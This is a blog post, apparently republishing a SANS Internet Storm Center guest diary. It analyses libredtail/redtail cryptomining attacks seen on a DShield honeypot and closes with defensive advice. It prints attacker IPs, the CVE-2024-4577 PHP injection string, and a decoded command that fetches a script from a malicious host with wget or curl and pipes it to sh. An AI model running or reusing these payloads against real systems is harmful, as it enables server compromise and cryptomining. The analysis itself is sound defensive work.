{"id":2795,"date":"2026-04-30T01:04:13","date_gmt":"2026-04-30T01:04:13","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/"},"modified":"2026-04-30T01:04:13","modified_gmt":"2026-04-30T01:04:13","slug":"danger-of-libredtail-guest-diary-wed-apr-29th","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/","title":{"rendered":"Danger of Libredtail [Guest Diary], (Wed, Apr 29th)"},"content":{"rendered":"
\n

[This is a Guest Diary by James Roberts, an ISC intern as part of the SANS.edu BACS<\/a> program]<\/p>\n

Over the last few months, I have gained valuable experience working with the Internet Storm Center (ISC) operating a honeypot and analyzing its output via a SIEM<\/a> environment.\u00a0 This work gave me hands on experience with system set on a Raspberry Pi environment, utilizing command line interfaces, SIEM deployment, networking, and information analysis.\u00a0 This experience was also a good demonstration of difficulty of finding useful information in a sea of logged data and how to find interesting items within it.\u00a0 Some of the most interesting items were indicators relating to cryptomining malware.<\/p>\n

DShield Honeypot<\/strong><\/span><\/p>\n

The DShield sensor is a honeypot system that information from HTTP, telnet, SSH, and firewall logs.\u00a0 When deployed, it uses a Cowrie honeypot to simulate a Debian system to capture SSH and Telnet interactions, web.py and tcp-honeypot.py to simulate various services and obtain HTTP and TCP interactions, and finally scripts to collect, process and submit these and firewall logs.\u00a0 These logs are sent to ISC, as well as an ELK SIEM that is set up on another system of mine.\u00a0 With the SIEM, I was better able to parse, research, and understand the information produced by the various DShield logs.\u00a0 Sometimes I would see something more interesting than just a standard SSH login attempt<\/p>\n

Identifying Something Interesting<\/strong><\/span><\/p>\n

Around the halfway point in my internship, I did an attack observation about a type of cryptomining malware known as redtail.\u00a0 After completing that observation, I noticed that there was another, different, variety of redtail based attacks I had previously not noticed, this time operating via HTTP instead of SSH\/telnet.<\/p>\n

\"\"<\/p>\n

As the most commonly occurring User Agent, and one of the most common items of HTTP information over the entire course of my DShield sensor\u2019s deployment, I felt compelled to investigate further.<\/p>\n

Overview of the Culprits<\/strong><\/span><\/p>\n

While I had 113 different IP addresses perform libertail-http activity on the DShield sensor, I am opting to focus my observation on the top three IP addresses for the sake of simplicity.<\/p>\n

\"\"<\/p>\n

All three of these IP addresses attempted to perform the same attack multiple times over the course of several days.\u00a0 The IP addresses came from different counties, Germany, Great Britain, and India.\u00a0 All the observed libertail-http Ip addresses had similar general HTTP behavior, though there are some exceptions.\u00a0 Most of the IP addresses observed additionally attempted to log in to the honeypot via SSH, as well as performing a SYN scan.<\/p>\n

\"\"<\/p>\n

\"\"<\/p>\n

IP addresses 82.165.66.87<\/span> and 103.40.61.98<\/span> are almost identical in their behavior, even both exclusively using the same Username\/Password login combination (admin\/admin).\u00a0 It is likely all the attackers are actually bots, but these two are likely using the same script to perform the same probing activity.\u00a0 Based on other information that will be seen later, they might actually be the same attacker using different IP addresses.\u00a0 Their behaviors are also more representative of the behavior observed by other attackers.\u00a0 IP address 2.27.53.96<\/span> is much more aggressive in its attempt to log in with SSH and is less aggressive about the number of ports it scans.\u00a0 Much of its activity is still similar to the other observed IP addresses, but it is unique in some ways.<\/p>\n

Patterns of Behavior<\/strong><\/span><\/p>\n

Each of the attacks begins with a series of four HTTP POST actions.<\/p>\n

From IP 103.10.61.98 on March 27 0623UTC<\/p>\n

http.request.body\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 http.response.body.content\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 url.query
\n\"\"
\n\"\"<\/p>\n

The first two POST actions are effectively the same, with the only difference being that the first one uses URL encoding to traverse to \/bin\/sh while the second one doesn\u2019t.\u00a0 This directory traversal is attempting to look for CGI misconfigurations and allow the use of \/bin\/sh for command execution.\u00a0 Additionally there is an attempt to connect to 31.57.216.121\/sh through wget and curl.\u00a0 On March 3, similar behaviors were logged for 178.16.55.224\/sh<\/span> instead.\u00a0 IP address 82.165.66.87<\/span> also attempts to connect to both of these address as well and IP 2.27.53.96<\/span> additionally used 46.151.182.82<\/span>.\u00a0 After connecting via SH to an address, apache.selfrep is run.\u00a0 Based on the name, apache.selfrep is likely a script designed to maintain persistence on a target.\u00a0 IPs 31.57.216.121<\/span>, 178.16.55.224<\/span>, and 46.151.182.82<\/span> are known malicious IP addresses associated with cyrptomining malware infrastructure.\u00a0 The url.query is the request.body information in its more original state, which is in base64.\u00a0 The base64 encoding was likely done to obfuscate the attack or to more reliably deliver the attack against a wider variety of system or both.<\/p>\n

The next two POST actions related directly to CVE-2024-4577, an exploit strongly associated with redtail malware that targets PHP services.\u00a0 The request body line \u201d: d+allow_url_include=1+ d+auto_prepend_file=php:\/\/input\u201d takes advantage of older PHP versions\u00a0 flaw of replacing certain characters given into something else using a \u201cBest-Fit\u201d behavior that misinterprets characters as PHP options and allows running arbitrary PHP code.\u00a0 In this case, that arbitrary code is being used to the inclusion of extra input from the HTTP request body.\u00a0 That request body input accesses shell.exe and sends a base64 encoded set of commands\u00a0
\n\u201cKHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMzEuNTcuMjE2LjEyMS9zaCB8fCBjdXJsIC1zayBodHRwczovLzMxLjU3LjIxNi4xMjEvc2gpIHwgc2ggLXMgY3ZlXzIwMjRfNDU3Ny5zZWxmcmVw<\/span>\u201d.\u00a0 This can be decoded into (wget –no-check-certificate -qO- https:\/\/31.57.216.121\/sh || curl -sk https:\/\/31.57.216.121\/sh) | sh -s cve_2024_4577.selfrep). This is very similar commands found in the previous POST commands, running cve_2024_4577.selfrep as a different script.\u00a0 Additionally, echo(md5(“Hello CVE-2024-4577”) is also run to print a message to indicate the previous commands have run correctly.\u00a0 Like the other POST actions, the original query was encoded in base64.<\/p>\n

Next the attack begins probing various .php installation paths.\u00a0 The paths are requested, with \u201c<?php echo(md5(“Hello PHPUnit”));\u201d created as a response if the requested path is found.\u00a0 This reconnaissance is likely being done to map out what specific type of PHP is available and by extension what other vulnerabilities could be utilized in the future.<\/p>\n

From IP 82.165.66.87 on March 27 12:55 UTC<\/p>\n

http.request.body.content\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0http.response.body.content
\n\"\"<\/p>\n

In addition to the HTTP interactions, the IP addresses also attempt to interact with the honeypot by logging on via SSH and engaging in SYN scans on various ephemeral ports.\u00a0 If a SSH login is successful, there are no attempts to run other commands.\u00a0 The logins and port scans typically hours before or after the HTTP actions and are likely the bot engaging in those probing actions independently from anything related in HTTP.\u00a0 The SYN scans consistently produced failures for the scanned ports.<\/p>\n

From IP 2.27.53.96<\/strong><\/span><\/p>\n

Timestamp\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Source IP\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Source port\/outcome
\n\"\"<\/p>\n

Redtail Cryptomining Malware<\/strong><\/span><\/p>\n

While the attack engaged in several actions, perhaps the most important was running cve_2024_4577.selfrep.\u00a0 That script is performs several actions, such as finding out about system architecture, finding directories to write new files, searching cronjobs relating to other cryptominers and stopping their services, and installing an appropriate version of redtail and naming it \u2018.redtail\u2019 to make it a hidden file.\u00a0 The versions of redtail are x86_64, i686, aarch64, and arm7.\u00a0 While redtail cryptominers have been part of the threat landscape since 2023, libredtail-http and CVE-2024-4577 started appearing later in mid 2024.<\/p>\n

\"\"<\/p>\n

How to Protect against Redtail<\/strong><\/span><\/p>\n

Protection and remediation, why it matters<\/span><\/p>\n

There are many things that can be done to protect against this type of attack.\u00a0 If possible, patching to a more current version on PHP can help.\u00a0 Writing a rule to block the libredtail-http user-agent on a WAF, reverse proxy, IPS, host firewall, or a tool like Fail2Ban could block the types of attacks seen here.\u00a0 Rules could probably also be made to block traffic involving IP any variation of ip.ip.ip.ip\/sh, something seen and these attacks and rarely ever seen in legitimate traffic.\u00a0 Given the volume of http traffic created, monitoring the network activity for unusual behavior could help discover a compromise.\u00a0 Setting up SSH shared keys or authentication against another server could help protect a system against unwanted SSH login attempts.<\/p>\n

[1] https:\/\/isc.sans.edu\/honeypot.html
\n[2] https:\/\/github.com\/cowrie\/cowrie
\n[3] https:\/\/infosecwriteups.com\/honeypots-102-setting-up-a-sans-internet-storm-centers-dshield-honeypot-1ec1774bd949
\n[4] https:\/\/github.com\/bruneaug\/DShield-SIEM\/blob\/main\/README.md
\n[5] https:\/\/192.168.80.139\/app\/dashboards#\/view\/d525c518-3e97-4375-9e38-ded8f18934a4?_g=(filters:!(),time:(from:now-90d%2Fd,to:now))
\n[6] https:\/\/www.joesandbox.com\/analysis\/1851676\/0\/html
\n[7] https:\/\/www.joesandbox.com\/analysis\/1890665\/0\/html
\n[8] https:\/\/www.joesandbox.com\/analysis\/1893948\/0\/html
\n[9] https:\/\/www.socdefenders.ai\/threats\/b91c3aa2-d17d-4621-8f76-99e3226bdecb
\n[10] https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-4577
\n[11] https:\/\/www.forescout.com\/blog\/new-redtail-malware-exploited-via-php-security-vulnerability\/
\n[12] https:\/\/roccosicilia.com\/2025\/07\/15\/cve-2024-4577-payload-analysis\/
\n[13] https:\/\/www.sans.edu\/cyber-security-programs\/bachelors-degree\/<\/p>\n

———–
\nGuy Bruneau IPSS Inc.<\/a>
\nMy GitHub Page<\/a>
\nTwitter: GuyBruneau<\/a>
\ngbruneau at isc dot sans dot edu<\/p>\n

(c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"

[This is a Guest Diary by James Roberts, an ISC intern as part of the SANS.edu BACS program] Over the last few months, I have gained valuable experience working with the Internet Storm Center (ISC) operating a honeypot and analyzing its output via a SIEM environment.\u00a0 This work gave me hands on experience with system […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[90],"tags":[91],"class_list":["post-2795","post","type-post","status-publish","format-standard","hentry","category-cybersecurity","tag-cybersecurity"],"yoast_head":"\nDanger of Libredtail [Guest Diary], (Wed, Apr 29th) - Imperative Business Ventures Limited<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Danger of Libredtail [Guest Diary], (Wed, Apr 29th) - Imperative Business Ventures Limited\" \/>\n<meta property=\"og:description\" content=\"[This is a Guest Diary by James Roberts, an ISC intern as part of the SANS.edu BACS program] Over the last few months, I have gained valuable experience working with the Internet Storm Center (ISC) operating a honeypot and analyzing its output via a SIEM environment.\u00a0 This work gave me hands on experience with system […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/\" \/>\n<meta property=\"og:site_name\" content=\"Imperative Business Ventures Limited\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-30T01:04:13+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"headline\":\"Danger of Libredtail [Guest Diary], (Wed, Apr 29th)\",\"datePublished\":\"2026-04-30T01:04:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/\"},\"wordCount\":1482,\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png\",\"keywords\":[\"Cybersecurity\"],\"articleSection\":[\"Cybersecurity\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/\",\"url\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/\",\"name\":\"Danger of Libredtail [Guest Diary], (Wed, Apr 29th) - Imperative Business Ventures Limited\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png\",\"datePublished\":\"2026-04-30T01:04:13+00:00\",\"author\":{\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"breadcrumb\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage\",\"url\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png\",\"contentUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/blog.ibvl.in\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Danger of Libredtail [Guest Diary], (Wed, Apr 29th)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.ibvl.in\/#website\",\"url\":\"https:\/\/blog.ibvl.in\/\",\"name\":\"Imperative Business Ventures Limited\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.ibvl.in\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/blog.ibvl.in\"],\"url\":\"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Danger of Libredtail [Guest Diary], (Wed, Apr 29th) - Imperative Business Ventures Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/","og_locale":"en_US","og_type":"article","og_title":"Danger of Libredtail [Guest Diary], (Wed, Apr 29th) - Imperative Business Ventures Limited","og_description":"[This is a Guest Diary by James Roberts, an ISC intern as part of the SANS.edu BACS program] Over the last few months, I have gained valuable experience working with the Internet Storm Center (ISC) operating a honeypot and analyzing its output via a SIEM environment.\u00a0 This work gave me hands on experience with system […]","og_url":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/","og_site_name":"Imperative Business Ventures Limited","article_published_time":"2026-04-30T01:04:13+00:00","og_image":[{"url":"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#article","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/"},"author":{"name":"admin","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"headline":"Danger of Libredtail [Guest Diary], (Wed, Apr 29th)","datePublished":"2026-04-30T01:04:13+00:00","mainEntityOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/"},"wordCount":1482,"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage"},"thumbnailUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png","keywords":["Cybersecurity"],"articleSection":["Cybersecurity"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/","url":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/","name":"Danger of Libredtail [Guest Diary], (Wed, Apr 29th) - Imperative Business Ventures Limited","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/#website"},"primaryImageOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage"},"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage"},"thumbnailUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png","datePublished":"2026-04-30T01:04:13+00:00","author":{"@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"breadcrumb":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage","url":"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png","contentUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png"},{"@type":"BreadcrumbList","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/blog.ibvl.in\/"},{"@type":"ListItem","position":2,"name":"Danger of Libredtail [Guest Diary], (Wed, Apr 29th)"}]},{"@type":"WebSite","@id":"https:\/\/blog.ibvl.in\/#website","url":"https:\/\/blog.ibvl.in\/","name":"Imperative Business Ventures Limited","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.ibvl.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/blog.ibvl.in"],"url":"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/"}]}},"_links":{"self":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/2795","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/comments?post=2795"}],"version-history":[{"count":0,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/2795\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/media?parent=2795"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/categories?post=2795"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/tags?post=2795"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}